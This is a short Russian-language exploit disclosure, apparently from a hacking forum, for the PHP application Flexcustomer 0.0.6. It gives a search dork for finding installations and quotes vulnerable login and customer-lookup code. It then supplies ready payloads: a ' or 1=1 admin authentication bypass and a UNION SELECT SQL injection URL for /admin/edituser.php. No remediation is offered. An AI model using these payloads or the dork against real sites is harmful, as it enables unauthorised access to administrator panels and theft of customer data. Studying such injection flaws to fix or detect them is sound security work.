Уязвимости Flexcustomer 0.0.6 (возможно уязвимы и более ранние версии)

download: http://www.china-on-site.com/flexcust/flexcusten.zip

dork: "Powered by Flexcustomer"

1) [bypass] (требования: magic_quotes=off)
не заметил, бага в паблике, но для следующей уязвимости она понадобится...
admin/usercheck.php
уязвимый код:

if (!empty($logincheck)){
$sql = "select username,adminid from useradmin where username='$checkuser' and password='$checkpass'";


эксплуатирование:
login:' or 1=1--+


2) [SQL-injection] (требования: magic_quotes=off, доступ в админ панель)

/admin/edituser.php

уязвимый код:

<?php
$userinfo = $db->getuserinfobyid($cid);

/CustomSql.inc

function getuserinfobyid($customerid)
{
$sql = "select * from customer where customerid='$customerid'";
$result = $this->select($sql);
return $result;
}

эксплуатирование:
/admin/edituser.php?cid=-1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+